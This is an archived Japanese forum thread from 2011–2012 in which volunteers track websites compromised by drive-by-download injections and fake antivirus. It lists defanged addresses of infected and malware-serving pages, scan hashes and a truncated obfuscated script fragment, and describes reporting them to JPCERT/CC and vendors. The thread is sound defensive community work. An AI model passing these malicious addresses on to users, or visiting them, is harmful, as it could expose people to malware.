それがお前さんのサイトのアクセス解析に残った
そんだけ
鑑定は他でやれ
714 :
素人 :2011/01/31(月) 16:50:34
ブラウザを見ただけでボットに感染することってありますか?
>>714 感染した感じがしたら、もう掛かってますw
>>714 どこからここにたどり着いちゃったの?
素人をアピールすることに何の意味があるの?
ブラウザを見るってのは実行ファイルを見るってこと?
ファイル見ただけじゃ感染しようがないでしょ
717 :
名無しさん@お腹いっぱい。 :2011/02/05(土) 00:27:38
オミトロンに登録した古いGenoウイルス警告スクリプトがこのサイトに反応した www●no-review●net/ Javaスク切った状態でアクセスしてるから異常は無いと思うんでウイルスチェックはしてない。 みんなはどう?
718 :
名無しさん@お腹いっぱい。 :2011/02/05(土) 12:07:10
最近活気無いなあ そろそろいいの?
>>717 いろいろアレだけど
JavaScriptオフで防げないのもあるから注意してね
>>721 ソース見たけど1行目からロシア行こうとしててすごくおろロシア
末尾にもあるね
>>721-723 消滅じゃなくて戦略的撤退だったのね・・
改竄祭絶賛開催中
isawa-crystal●com/
ソース見てワラタ
>>724 ひどすぎて吹いた
danさん経由なのにAviraが怒り出すしひどい
>>726 乙
どっとこむ8080装填中
club-garcons●com/
>>727 banana3306●maido3●com
う〜む。。。
>>727 いちおメルすた。
連絡先がドコダなので蹴られている可能性大。。。
システム復元で偽セキュリティを駆除できると思ってる大馬鹿者が急増してるなw
VTがおかひいお。。。
(・肉・) トレトレピチピチカニリョーリ♪ JSUNPACK 6e2cf8ebd8635107d4e26b2861c3a26cf4073e14
>>734 自分で燃料投下して逆ギレとか、どんだけバカなんだよwwww
!ninja
>>734 >たぶん、セキュリティがちょっと低く設定されていたか
>JAVAが最新でなかったのが原因で入り込まれたとか考えられるそうです。
>ウイルスバスターも強制終了ww
>エ○サイトのURLはLunascapeに登録していたので消えましたがww
ユーザーのセキュリティー意識が低ければ
糞の役にも立たないウイルスバスターにワロタ
>>738 それはなんでも同じじゃね
ユーザーが全て許可をしてしまえばおしまい
無知は怖いよ。 アメーバピグのFlashのバージョンアップで運営ブログが炎上したのだって 未だに平気でVer9を使っている連中が原因だぞ。
>>739 ウイルスバスターは、低次元な広告を見てもアホユーザーがメイン対象にもかかわらず
そのアホユーザーには効果がないなら、存在が無意味だろうし
アホユーザー前提に設計したほうがいいと思うのよね。
許可するシーンで
例のヤクザ坊主が出てきて、しつこく何度も脅すとか
例の女が発狂しているシーンが出てきて、JAVAのアップデートを促すとかw
ドライブバイダウンロードを喰らうバカに多いパターン 1:「○○(セキュリティソフト)を入れてるから大丈夫」と豪語している 2:全てをセキュリティソフトに依存しているため、 地雷(DBD)を踏むと高確率で感染する 3:「○○入れてたのに感染した(怒)」と、セキュリティソフトに文句を言う 4:必死になって駆除方法を捜して駆除は行うが、 感染原因を知ろうとしない為、根本的な対策ができない(駆除方法と一緒に書いてあっても一切見ない) 5:2に戻る セキュリティソフト依存症は病気(精神疾患)ですよw
依存してるんじゃなくて何も知らないだけってのもある
セキュリティソフトも偶然入ってるだけで場合によっては期限切れ
>>741 たしかにそうだね
たとえ誤爆してでも初心者ユーザーには選択肢を与えないほうがきっと安全
バスターが把握していないものは許可しないとかそういうモードをつけてもいいかもしれない
どうせ初心者なら使うソフトも限られてるだろうし
>>744 >作成罪に加え、提供、取得、保管などの罪を新設。
マルウェアの取得が違法
↓
ベンダーに検体が提出されない
↓
極地的に流行るマルウェアに対応できず、感染PCが急増
↓
感染したPCを所有する者は容赦無く逮捕
↓
罰金(30万円以下)と、証拠品として押収したPC(クリーニングされた後、中古品として販売)でガッツリ稼ぐ
さすが欠管政権w
穴だらけなのに隙が無いなwwww
記事には書いてないけど、提供・取得・保管が罪になるには前提条件があって 他人のPCを感染させる目的の場合らしいよ
>>745 辞民党は何もしてこなかったけどなwwww
お、停電復帰したようですね貴方
(VдV)の俺様ブログ -顔文字の俺様ブログ-
ttp://ruhuraro.blog57.fc2.com/ >このページの表示は許可されていません
>このブログは下記の理由などにより凍結されています。
>* 規約上の違反があった
>* 多数のユーザーに迷惑をかける行為を行った。
震災の記事の件で通報したら消滅すたw
>>754-755 ttp://ameblo ●jp/ruhuraro/entry-10847321466●html
>(VДV)┌ んなことよりfc2でやってる俺様ブログがなぜか凍結されたぜ
>l(VДV)l一体、この俺様が何をしたというのかあぁぁぁぁああああ!!!!
>(VдV )震災をネタにしすぎたかしらん♪ちょっぴ反省w
反省しなくて良いからさっさと氏ねよ
760 :
名無しさん@お腹いっぱい。 :2011/04/05(火) 00:12:59.51
Wo[BLOCKED]ks.com/ur.php al[BLOCKED]ne.com/ur.php al[BLOCKED]er.com/ur.php li[BLOCKED]on.com/ur.php t6[BLOCKED]56.info/ur.php
!denki!ninja
ほんまにわらかしてくれる 無菌状態にしようとするからいたちごっこになる ゾンビの体でなにが来ても復活できるようにすれば問題なくなる。 仮想環境はもっと使いやすく作れるだろに セキュリティ産業をすぐにすたれさすのはもったいないと言って 作らない。
test
JSUNPACK > MySQLdb error orz...........
JsunpackがトンだらとりあえずWepawet使えって爺ちゃんが言ってた
>>771 今流行のSEOポイズニングっての突っ込んだら固まったお。。。
Wepawetはすげー時間かかるよ
6月1日からは日本がインターネットの枠組みそのものから離脱するのかのう
ノ も少し待つやうにすんべさ。
>>751 IE 10.3.181.23
Fx 10.3.181.22
それNOD32厨の自演だろw
アルファルファモザイクの様子がおかしい
GENOウイルスってもう下火になったのかね ここも全然レスないし
なってないよ むしろ流行を終えて定着した
取扱注意 www●hotel-socatel●be/ 釣りに使った場合・・違法になるかどうかはしらん
>>786 今の状況は
Gumblar.xは去年から停止中
8080は一部サイトで不審なコードが定期的に追加される状態が起こってる感じ
>>789 うさんくさいサイトのようだけど
トップページには特に不審なコードはないように思うん
http://www ●radio-80●com/soft●exe
偽アンチウィルスソフト配布してるぞ
794 :
名無しさん@お腹いっぱい。 :2011/08/01(月) 23:49:09.52
http://www ●ganbanyoku-tsubaki●jp/
ccドメインのexploitコードを食わされるパターン
795 :
名無しさん@お腹いっぱい。 :2011/08/02(火) 00:05:28.87
http://www ●expressionengine●jp/
難読化されてるタイプでやっぱりccドメインから
あっー、ひとつ手前の*.cz.ccにも逝けなくなった。。。
>>794 アクセスログとってるのか?
798 :
名無しさん@お腹いっぱい。 :2011/08/02(火) 00:19:36.11
799 :
名無しさん@お腹いっぱい。 :2011/08/02(火) 00:26:36.83
jpから来たの弾くパターンもあるみたいだけど jpドメインをつかって他国の人間をターゲットにするんかいな
おぉ、よく見なかった。
踏み台とか結構あったよ
>>799
JP外しは結構前からされてる戦略なのか 儲からんし、めんどくさいんだろうなあ
>>794 おくた。
>>795 デジロにつーほ。
でもデジロは遅いので、どなたかふぇーすぶっくから教えてあげてくらはい。。。
>>798 みてみゆ。。。
眠い。
>>798 とりあえずさくらにつーほ。
あきたねる
おまけ
http://www ●momohime-medical●com/~momohime/deary82●html
http://www ●passo-co●jp/~passocojp/lean77●html
両方とも同じグループに属してる?踏み台 薬を売ってくれるサイトに誘導してた痕跡がある
808 :
名無しさん@お腹いっぱい。 :2011/08/03(水) 19:05:28.94
てす
>>807 それは去年の8080の時のものです
その踏み台リンクと画像(deary82.jpg、lean77.jpg)をのせたメールをボットマシンで配信してた
今も落ちてるよ
www●niki-selection●com 今話題の通販系にインジェクションしちゃうタイプ
>>813 これからみゆお。
また蹴られてる*.えう
orz....
http://www ●sippo-booomb●com/
去年は動いてたようなやつ
ロシアから直接.jsがやってきてたようだ
818 :
名無しさん@お腹いっぱい。 :2011/08/26(金) 03:22:41.51
820 :
名無しさん@お腹いっぱい。 :2011/09/06(火) 12:35:37.34
http://www ●asakusa-kagetudo●com/modules/shop/
このディレクトリすごく臭いです。
例えば/shop/es.txt??とか
C&Cサーバっぽいことになってるのかな
よくみりゃIRCでボットに命令するみたいだ
http://iconic-intl ●sakura●ne.jp/
これだけだと問題なさそうだけど
こいつをつけるとwolve●html
害はなさそうだけど、アレなページに飛ぶようだ
こういう会社なんだろうか
踏み台にされてるんでしょ
Win32/Daonolの亜種で、midi9を使っていないものってありますか? 症状が全く同じもののPCを持っていますが、本来ある場所にあるはずのmidi9がありません。
すいません。ウイルスが原因ではない問題だったようです。 スレ汚し失礼しました
>>825 あるとおもうよ
そういう調べ方はやめたほうがいい
http://www ●ibs-radio●com
www●dinsuceava●roがアレですかね・・・
>>828 ですね~
Google セーフ ブラウジング診断 より
疑わしいサイトとして認識されています。このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。
過去 90 日間に、このサイトの一部で不審な動きが 2 回検出されています。
このサイトで過去 90 日間に Google がテストした 92 ページのうち 23 ページで、
ユーザーの同意なしに不正なソフトウェアがダウンロードされ、インストールされていたことが判明しました。
Google が最後にこのサイトを巡回したのは 2011-09-23 で、このサイトで不審なコンテンツが最後に検出されたのは 2011-09-23 です。
不正なソフトウェアには 24 trojan(s) などがあります。感染先のコンピュータで平均 4 個のプロセスが新たに発生しています。
Online Link Scan (AVG・Google・SiteTruth・PhisTank) ・・・ 未検出
セキュアブレイン gred ・・・ 未検出orz(通報済み)
シマンテック ・・・ 未検出orz(通報済み)
今北
>>828 リロードしたらスクリプト消えたん。
>>829 乙です。
とりあえずJSUNPACKにスクリプトかけてみたお。(その間に対応されてた。)
407f4efb5e405a90d8aee230d5676eb4b3b795a6
被害サイトは・・・IBS 茨●放送 茨●県を放送対象地域とする中波(AM)放送局を保有する 基幹放送局提供事業者である 株式会社IBSの設備を利用してラジオ放送を行っている。 茨●方面、他にもあるかもよ roはルーマニアのドメインだね
一応こちらからもJPCERT/CCとIPA他にスクリプトとその先のスクリプト、
>>828 の下でのぉとんせぃふうぇぶで出てくるjarを送ったお。
VTいきなり死んだ。。。orz.........
833 :
828 :2011/09/24(土) 23:52:47.51
>>829-832 ご確認とご対応ありがとうございました。
特に◆.htmlint.Uさんは毎回お疲れ様でございます!
識別代わりにコテ付けてるだけです。 八頭さん、コテハンさん、夷塚さんをはじめとするコテの方々、名無しのみなさんに比べればまだまだです。 なによりもお伝えいただいた828さんに感謝です。
とりあえずここのスレに挙げられているサイトを サイトのアドレスの一部をワイルドカードと合わせてavastのサイトブロックに登録するだけで有効かな?
>>836 お疲れ様です。
鯖缶、上位鯖缶とかにつーほーしました。
茨城繋がりだたーのね。
>>837 >まぁ、ここで出たのを初回として3回目のとこを管理者だめっぽいので
>>832 の時にIPAにつーほーすた。
何を言っているのかわからない
「ここで出たのを初回として3回目のとこを管理者だめっぽいので」ってどういうこと?
>>841 一度対応されてから、再改竄->再対応、再々改竄を確認したのがあったので。
日本語では「3回目なので」と言うんだ
(゚ν゚)ニホンゴムズカスィネー
>>840 なるほど
>>6 には無いけど
登録が東京でもピュアニックは茨●なんだね
関連性や着眼点はランダムであっても注視しておいた方が後学にはなるかも
Google セーフ ブラウジング診断は、追跡開始と同時に90日間の結果も教えてくれる
各自、地元放送局やラジオ局など気になるキーワードでざっと調べてみるといいよ
>>792 はローグソフトばら撒く砲台リンクってわかってここに書いた後、すぐになくなってしまった。
http://www ●ganbanyoku-tsubaki●jp/
ここって絶賛放置中でしたっけ
>>846 今現在、TrendMicroとFortinetだけ反応してるようだ
Aviraとセキュアブレインとシマンテックへ依頼を出しました。
http://www ●cometcrash●com
このサイト乗っ取られちゃってるんですかね?
グーグルのキャッシュだとゲーム関連のサイトのようですし。
>>850 Server HackeD By TiGER M@TE
遊んでますねw
852 :
名無しさん@お腹いっぱい。 :2011/09/28(水) 20:31:04.95
2000鯖サイト改竄の模様ですが..... 怪しげなGenuineCheck.exeが開くと落ちて着ます サイト開くのに必要なのか.....Winエミ梨で実行不能だけど
もう何も見えない JSUNPACK 1f8a23b66cec81cb6d0305139524e72e0a7ec842
>>854 リンク先のアダルトサイトからscandsk.exeが落ちてきた
…けどVMで実行しても何も起きず。
とりあえずavastに検体提出
>>853 オツカレサマです。
&lr=lang_ja
日本語ページのある彼の国とこへメル
蒲公英は現在無い模様。。。
>>856 お疲れ様です。
nu蹴られちゃってるっぽいので助かりまうす。
結構なスルー率だねえ
VTしぼー中
>>860 別のアドレスに飛ばされるようになたー。ファイルは同じもの
ckt6●cnじゃなイカ?
870 :
865 :2011/10/11(火) 22:26:58.94
>>871 いつも乙です
時間のある時にでもまた検体調査に行ってくるかな・・・
VT うrl c41e3a4f7ce7de96783854658a1241c7-1318588576 ふぁいる 786d47110b92908dd5ced091bfea6046ddd8a87b0770abecfae61628b7199563-1318596141 JSUNPACK f0091f107e0bd469a047c33d1f9c4c20c4d239d9 飛び先はまたころころ変わりそう。。。
>>876 すでにリンク先が変更に・・・毎日変更ですかorz
今回はWebページ型FakeAV付き
Jsunpack
928990f5a388f32839a21c81c23ee4f880d42693
Webページ
f958e91b6e19ecfb7d6fac4c94231b0abb7ad2bac31c692b9c87ff6027a8bacb-1318684027
2/ 42 (4.8%)
本体EXE
8065d71f793769d4d9cc1c341e2d038d95428e0aeeaf3702c9e31ff590921747-1318684037
12/ 43 (27.9%)
落ちてきたルートキット?(既出っぽい)
8fb7c5dc29ca514bc2987d270513c86a3084466b23213d224408c682b8171405-1318684489
25/ 43 (58.1%)
EXEとWebページがまた新型に。本当に毎日変更ですなw EXE 16d9696f4a32bcd571c5c55ac5e4fcb9cc3348ac7ec936ad6c46c447e63d626b-1318780277 Webページ ab0e74102c941cff75b0ee3469c95a41484d29043d17f874a5faa5f14665805d-1318781102 VMだから偽アンチウイルスが発動しないのか、日本IPは弾かれてるのか… 往時の8080は鯖さえ生きてればお構いなく発動したもんですが
もう、いやん JSUNPACK d127c4dba13422aaba02157e6e0111c09d91401f
ブックオフかい…
>>886 投稿フォームからのスパムっぽい
とりあえずスパムの削除依頼してみた>ばりゅどめ
virscan.orgって更新されたっぽい?
ぱっと見た感じ従来と変わらんようだけど?
ノシ
Flash 11.1.102.55
>>898 ぅゎゎ
調子悪いので保留。。。orz.....
こんなかんじ? JSUNPACK 899a47a3cb97a613973f7721405b58670ee8a5ad 飛び先は404っぽい
ん?合ってるんかな?
げっとしたっぽい
aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjIzOC0wNy9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3
二回目以降のアクセスはスクリプトが消える仕様?
aHR0cDovL21lZ2Fsb2Rvbi5qcC8yMDExLTExMjUtMjI0OC0yMS9yZC5vci50bC9nZXQucGhwP3Np
dGU9aHR0cCUzQSUyRiUyRm1lc3Npbm9oZXlhJTJFaW5mbyUyRmF1dGhvciUyRmFkbWluJmFjdD12
aWV3DQpodHRwOi8vbWVnYWxvZG9uLmpwLzIwMTEtMTEyNS0yMjMyLTQ3L3d3dy5kYW4uY28udWsv
dmlld3NvdXJjZS9pbmRleC5waHA/dXJsPWh0dHAlM0ElMkYlMkZtZXNzaW5vaGV5YSUyRWluZm8l
MkZhdXRob3IlMkZhZG1pbg==
>>900 で見つけたはずなのに、わからなくなったので
>>901
907 :
名無しさん@お腹いっぱい。 :2011/11/26(土) 00:26:18.87
[厚労省サーバー感染、PC1万台ネット接続不能]
http://www.yomiuri.co.jp/national/news/20111129-OYT1T01327.htm 労災などの業務管理を行う厚生労働省の情報システムのサーバーが、ウイルス対策ソフトを装ったコンピューターウイルス
に感染し、同システムにつながる全国約1万台のパソコンが点検のため、今月25日からインターネットに接続できなくな
っていることが、わかった。情報流出は確認されていない。ウイルスは無差別に感染するタイプとみられ、同省が復旧を急
いでいる。
同省によると、感染したのは、労災の申請や認定、支給などの処理を行う情報システム。今月25日、福岡労働局の職員が
業務中に企業のホームページを閲覧中、パソコンが勝手にウイルス検索を始めるなどしたため、不審に思った職員が申し出
て感染が判明した。
ウイルス対策会社によると、このウイルスはネット上で仕込まれたページを開いただけで感染するタイプで、ウイルス対策
ソフトを装ってクレジットカード情報などを要求。2年ほど前から国内でも感染が増加しているという。
▽読売新聞(2011年11月30日03時09分)
コンピューターウイルスにやられたと偽って わざと流出させている恐れもある
www●cave●co●jp Googleでは「このサイトはコンピュータに損害を与える可能性があります。」になってる
ちょいまえに北 見てる途中でメンテになったお ここ見てるのかな?
ユーザーから言われたか何かで気づいたのかもしれん
そかも とりあえずそれっぽいのはげとしたかも 飛び先は404っぽい JS(ry 8674564d35fb2e06f5ec059b6bfded1b26c048ea V(ry 9f065297b0fa42157b748f285347a1d3a8401d3e9c58dee686fd82392b169abc IPAとJPCERT/CC、ベンダーいくつかにトス
まかひからdatが北 なんか早いぽ。
>>914 あびら対応予定
JS/IFrame.aba
www●wisdomlead●co●jp/
眩暈が
>>917 お疲れ様です。
上流にメルしまひた。
なつかしの8080とかぱっとみでみっつスクリプトの内ふたつは検出率が低かったのでベンダーにトスしやした。
かすぺの自動応答にスパム扱いされちゃいました。
踏み台になってたかもん
>>920 詳細わからんのでなんともいえんけど
クライアントへの攻撃スクリプトが仕込まれたわけじゃなくて
どっかの入力フォームからサーバーが攻撃されたってだけかもよ
ああ改ざんもあったのね 期間短いと探せないかもな
見つからんかった
>>926 これは誤検知、というか実害がない
CAPTCHA用の画像ファイル内部にHTMLタグが誤って挿入されてしまってるだけ
928 :
名無しさん@お腹いっぱい。 :2012/01/03(火) 01:50:45.34
絶賛放置中 www●hototogisu-kun●com/ ↓ <script type='text/javascript'>eval(function(p,a,c,k,e,d・・ ("p") か ("o") い ("q") ざ ("r") ん
ちょい前北
>>928 見てる間にコード消されたっぽい
JSUNPACK 636292fe671d98d993c0a8af701627c4750e1003 飛び先は404っぽい
って、戻ってるお (´・ω・`) 消したんじゃなかったのか?>928
再改竄かお。 JSUNPACK 5f2bcf2b562358f2fd82d6b470c6e3a3e4ec3b53
>>928-933 Dan's View Sourceの魚拓
backupurl●com/31luot
やがちゃんのでも短縮URLは踏む気にならんわ
VirusTotalがリニューアルされてますね。 Max32MBまでになってるし。 あとは落ちている事が少なくなればいいなぁ。
>>938 久しぶりに検体が落ちてきた
順次virustotalに上げてみる
urlvoid.com調査ではIP Countryはチェコでした。UNRATEDが4件。 virustotal.comではUNRATEDが3件
世界は喫煙を推進しています。会から有能な人材がウィキペディアに参加しています。皆様方も喫煙化にご協力ください。
>>947 なんたらかんたら.osa.pl/showthread.php?t=なんたらかんたら
復活の呪文
www●dernier-exile●com んー
www.majin0001●com/
JRE 脆弱性更新
;; ::: :: : : _____________ : : : : :: :::: ::::: :;::;::::: :::: ;;::: ::: :: : : /|:: ┌──────┐ ::| / ピロン♪ピロン♪ : ::: :::: :;::; ;;::: ::: : : . . |:: | .| ::| 緊急ぬるぽ速報です : :: : ::: ::;:; ;;: :: :;;: :: : |:: 緊急ぬるぽ速報 ..::| 強いぬるぽに警戒してください ;;: :: : ;;: :: : .. |::..| ..| ::| \ : :: :: ::; :: ; ;;: :: : ;;: :: : .. |::..└──────┘::| : :: :: ::; :: ; : :: :: ::; :: ;: :: :: ::: :: :: ; :: ; ;: : ;;: :: : ... |:: ┌────┐ | : :: :: ::; :: ; : ; : :; : :: :: :: :: :: :::; :: ; || ドサッ  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ //∧_∧ ☆ __  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄(((゙゚'ω゚'))) うぁぁぁ ヽ/\_\ ゴン [#]:: ::[#] と_ ヽ ヽ \/__/ ⌒) | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| _))) ⊂⌒((;‐ω‐))  ̄| ̄| ̄ ̄ ̄ ̄ ̄ ̄| ̄| ̄ ~}
jsunpackって最近死んでる?
wepawetでok
http○//proxyrider○com
ほしゅ
961 :
名無しさん@お腹いっぱい。 :2012/05/12(土) 00:31:49.37
保守あげ
あげほす
963 :
名無しさん@お腹いっぱい。 :2012/05/23(水) 14:47:43.88
AvastとAviraは例外として それ以外・・・すなわち、@Panda AAVG BALYac CJUST DKing EComodo FMSE このあたりのフリーソフトでどれにするか迷っているなら、絶対にFMSEにすべきだね 日々ありとあらゆる感染実験をし、世界のクラッカーコミュを渡り歩き 英文でさまざまな解決策論文を発表し、痴餌袋等でも迷える子羊たちにバンバン指南し解決に導いている FakeAVの研究では世界をリードしているプロの俺様がいうのだから間違いない( ー`дー´)キリッ
頭悪そう><;;
8080っぽいのが北 こちらの環境では到達できにゃー 件名 : POST/EDIT/DELETE : "Local News in Astoria Journal " (rvs) d9378c84f32ddc157bdbe1b59790fa084485e4d2
蕗カキコ
.
TCG「ヴァンガード」の公式HPがウィルス感染とかいう話題を耳にしたんだが・・・?
>>969 ニュースでやってたね。
具体的なウイルスの種類は言わなかったけど。
乙です。 修正済みっぽい めも c3284d km0ae9gr6m
どこ?
>>977 お疲れ様です。
Aviraから「JS/Luyeb.A」で対応予定と回答が来ました。
KasperskyとMicrosoftは回答待ちです。
JPCERT/CCには報告済みです。
>>978 対応ありがとうございます。
現在当該サイトは閉鎖しています。
http://www ●eekatei●com/
KasperskyとAviraに検体提出。
JPCERT/CCには報告済みです。
>>979 ノシ
>>980 結果が返ってきました。
Kaspersky「Trojan.JS.Agent.byo」
Avira「JS/Obfuscated.CR」
まーたin.cgiか